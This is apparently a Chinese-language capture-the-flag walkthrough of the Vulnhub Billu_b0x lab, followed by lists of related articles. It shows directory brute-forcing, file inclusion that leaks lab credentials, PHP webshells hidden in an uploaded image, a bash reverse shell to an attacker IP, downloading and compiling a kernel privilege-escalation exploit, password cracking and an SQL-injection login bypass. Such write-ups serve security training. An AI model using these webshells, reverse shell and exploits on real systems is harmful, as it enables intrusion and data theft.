Vulnhub Billu_b0x
一、信息收集
1.一、獲取IP地址:
map scan report for 192.168.118.137 Host is up (0.00017s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) MAC Address: 00:0C:29:69:99:DF (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.二、dirb目錄爆破
root@kali:~# dirb "http://192.168.118.137" /usr/share/dirb/wordlists/big.txt -o test.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: test.txt
START_TIME: Tue Nov 20 09:41:59 2018
URL_BASE: http://192.168.118.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.118.137/ ----
+ http://192.168.118.137/add (CODE:200|SIZE:307)
+ http://192.168.118.137/c (CODE:200|SIZE:1)
+ http://192.168.118.137/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.118.137/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.118.137/images/
+ http://192.168.118.137/in (CODE:200|SIZE:47559)
+ http://192.168.118.137/index (CODE:200|SIZE:3267)
+ http://192.168.118.137/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.118.137/phpmy/
+ http://192.168.118.137/server-status (CODE:403|SIZE:296)
+ http://192.168.118.137/show (CODE:200|SIZE:1)
+ http://192.168.118.137/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.118.137/uploaded_images/
---- Entering directory: http://192.168.118.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/ ----
+ http://192.168.118.137/phpmy/ChangeLog (CODE:200|SIZE:28878)
+ http://192.168.118.137/phpmy/LICENSE (CODE:200|SIZE:18011)
+ http://192.168.118.137/phpmy/README (CODE:200|SIZE:2164)
+ http://192.168.118.137/phpmy/TODO (CODE:200|SIZE:190)
+ http://192.168.118.137/phpmy/changelog (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.118.137/phpmy/contrib/
+ http://192.168.118.137/phpmy/docs (CODE:200|SIZE:2781)
+ http://192.168.118.137/phpmy/export (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/favicon (CODE:200|SIZE:18902)
+ http://192.168.118.137/phpmy/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.118.137/phpmy/import (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/index (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.118.137/phpmy/js/
==> DIRECTORY: http://192.168.118.137/phpmy/libraries/
+ http://192.168.118.137/phpmy/license (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.118.137/phpmy/locale/
+ http://192.168.118.137/phpmy/main (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/navigation (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/phpinfo (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/phpmyadmin (CODE:200|SIZE:42380)
==> DIRECTORY: http://192.168.118.137/phpmy/pmd/
+ http://192.168.118.137/phpmy/print (CODE:200|SIZE:1064)
+ http://192.168.118.137/phpmy/robots (CODE:200|SIZE:26)
+ http://192.168.118.137/phpmy/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.118.137/phpmy/scripts/
==> DIRECTORY: http://192.168.118.137/phpmy/setup/
+ http://192.168.118.137/phpmy/sql (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.118.137/phpmy/themes/
+ http://192.168.118.137/phpmy/url (CODE:200|SIZE:8367)
+ http://192.168.118.137/phpmy/webapp (CODE:200|SIZE:6917)
---- Entering directory: http://192.168.118.137/uploaded_images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/contrib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/pmd/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/setup/ ----
+ http://192.168.118.137/phpmy/setup/config (CODE:303|SIZE:0)
==> DIRECTORY: http://192.168.118.137/phpmy/setup/frames/
+ http://192.168.118.137/phpmy/setup/index (CODE:200|SIZE:12971)
==> DIRECTORY: http://192.168.118.137/phpmy/setup/lib/
+ http://192.168.118.137/phpmy/setup/scripts (CODE:200|SIZE:5169)
+ http://192.168.118.137/phpmy/setup/styles (CODE:200|SIZE:6941)
+ http://192.168.118.137/phpmy/setup/validate (CODE:200|SIZE:10)
---- Entering directory: http://192.168.118.137/phpmy/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.118.137/phpmy/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Nov 20 09:42:34 2018
DOWNLOADED: 61374 - FOUND: 37
爆破出不少信息:php
一、http://192.168.118.137/testhtml
二、http://192.168.118.137/phpmy/phpinfo mysql
三、http://192.168.118.137/phpmy/phpmyadminlinux
二、滲透測試
一、訪問http://192.168.118.137/test 提示file參數:web
二、GET測試不行,測試POST,發送POST有經常使用兩種方式:sql
2.一、Hackbarshell
2.二、Burpsuite數據庫
Burpsuite-GET轉換爲POST:ubuntu
Repeater-"charge request method"bash
三、測試出文件包含漏洞,用一樣的方法下載爆破出來的其餘文件
add.php、in.php、c.php、index.php、show.php、panel.php
代碼審計c.php,發現mysql連接用戶名、密碼和連接的數據庫:
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
還能夠獲取的信息系統的用戶名和密碼:
file=/var/www/phpmy/config.inc.php
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor'
四、用http://192.168.118.137/phpmy/登陸數據庫
獲取web登陸的用戶名和密碼 biLLu:hEx_it
五、登陸web查看web的功能:
show users
add user
有上傳圖片功能,測試是否能上傳一句話木馬
三、獲取shell
notepad++ 圖片加入一句話木馬
<?php system($_GET['cmd']); ?>
上傳一個圖片木馬:
上傳成功訪問:
執行CMD命令:
include($dir.'/'.$_POST['load']); include能夠執行.php文件
POST /panel.php?cmd=cat%20/etc/passwd;ls HTTP/1.1 Host: 192.168.118.137 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://192.168.118.137/panel.php Cookie: PHPSESSID=fpbnovc9pc3rlg2sfeies9j1f7 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 48 load=/uploaded_images/muma.jpg&continue=continue
執行反彈shell,需URL編碼
echo "bash -i >& /dev/tcp/192.168.118.128/4444 0>&1" | bash
nc 反彈成功:
菜刀連接:
uploaded_images爲寫權限目錄:
echo '<?php eval($_POST['123456']);?>' >> caidao.php
四、權限提高
提權到root:
www-data@indishell:/var/www$ cat /etc/issue
cat /etc/issue
Ubuntu 12.04.5 LTS \n \l
www-data@indishell:/var/www$ uname -a
uname -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
www-data@indishell:/var/www$
https://www.exploit-db.com/exploits/37292/
'overlayfs' Local Privilege Escalation-CVE-2015-1328
wget https://www.exploit-db.com/download/37292.c
chmod 777 37292.c
gcc 37292.c -o exp
Linux提取能夠參考:
https://blog.csdn.net/qq_20307987/article/details/65443902
notepad:
根據系統版本號找對應exp
- http://www.exploit-db.com
- http://1337day.com
- http://www.securiteam.com
- http://www.securityfocus.com
- http://www.exploitsearch.net
- http://metasploit.com/modules
- http://securityreason.com
- http://seclists.org/fulldisclosure
- http://www.google.com
補充:
文件包含獲取/etc/passwd和/etc/shadow 能夠直接爆破root密碼:
root@kali:~# unshadow passwd.txt shadow.txt >/tmp/unshadow.txt root@kali:~# john --format=crypt /tmp/unshadow.txt --show root:roottoor:0:0:root:/root:/bin/bash 1 password hash cracked, 1 left
SQL注入:
test文件包含得到index.php
(1) 審計index.php源碼,發現如下過濾規則:
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
str_replace的做用是將字符串\’ 替換爲空,
所以構造SQL注入登陸payload時,必須含有\’字符串,不然會報錯。urldecode的做用是將輸入解碼。(2) 常見的利用注入登陸的payload是’ or 1=1 — 修改這個在最後增長\’,str_replace會將這個\’替換爲空。使用php在線調試工具,測試以下:<?phpecho str_replace('\'','',' or 1=1 --\'');?>payload:' or 1=1 -- \'
- 1. VulnHub滲透實戰--Billu_b0x
- 2. VulnHub滲透實戰Billu_b0x
- 3. Vulnhub靶場滲透練習(二) Billu_b0x
- 4. Billu_b0x
- 5. billu_b0x[靶機]
- 6. 靶機Billu_b0x
- 7. Billu_b0x滲透總結
- 8. billu_b0x靶場刷題
- 9. Vulnhub靶場第二關
- 10. vulnhub-dc8
- 更多相關文章...
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. Window下Ribbit MQ安裝
- 2. Linux下Redis安裝及集羣搭建
- 3. shiny搭建網站填坑戰略
- 4. Mysql8.0.22安裝與配置詳細教程
- 5. Hadoop安裝及配置
- 6. Python爬蟲初學筆記
- 7. 部署LVS-Keepalived高可用集羣
- 8. keepalived+mysql高可用集羣
- 9. jenkins 公鑰配置
- 10. HA實用詳解
- 1. VulnHub滲透實戰--Billu_b0x
- 2. VulnHub滲透實戰Billu_b0x
- 3. Vulnhub靶場滲透練習(二) Billu_b0x
- 4. Billu_b0x
- 5. billu_b0x[靶機]
- 6. 靶機Billu_b0x
- 7. Billu_b0x滲透總結
- 8. billu_b0x靶場刷題
- 9. Vulnhub靶場第二關
- 10. vulnhub-dc8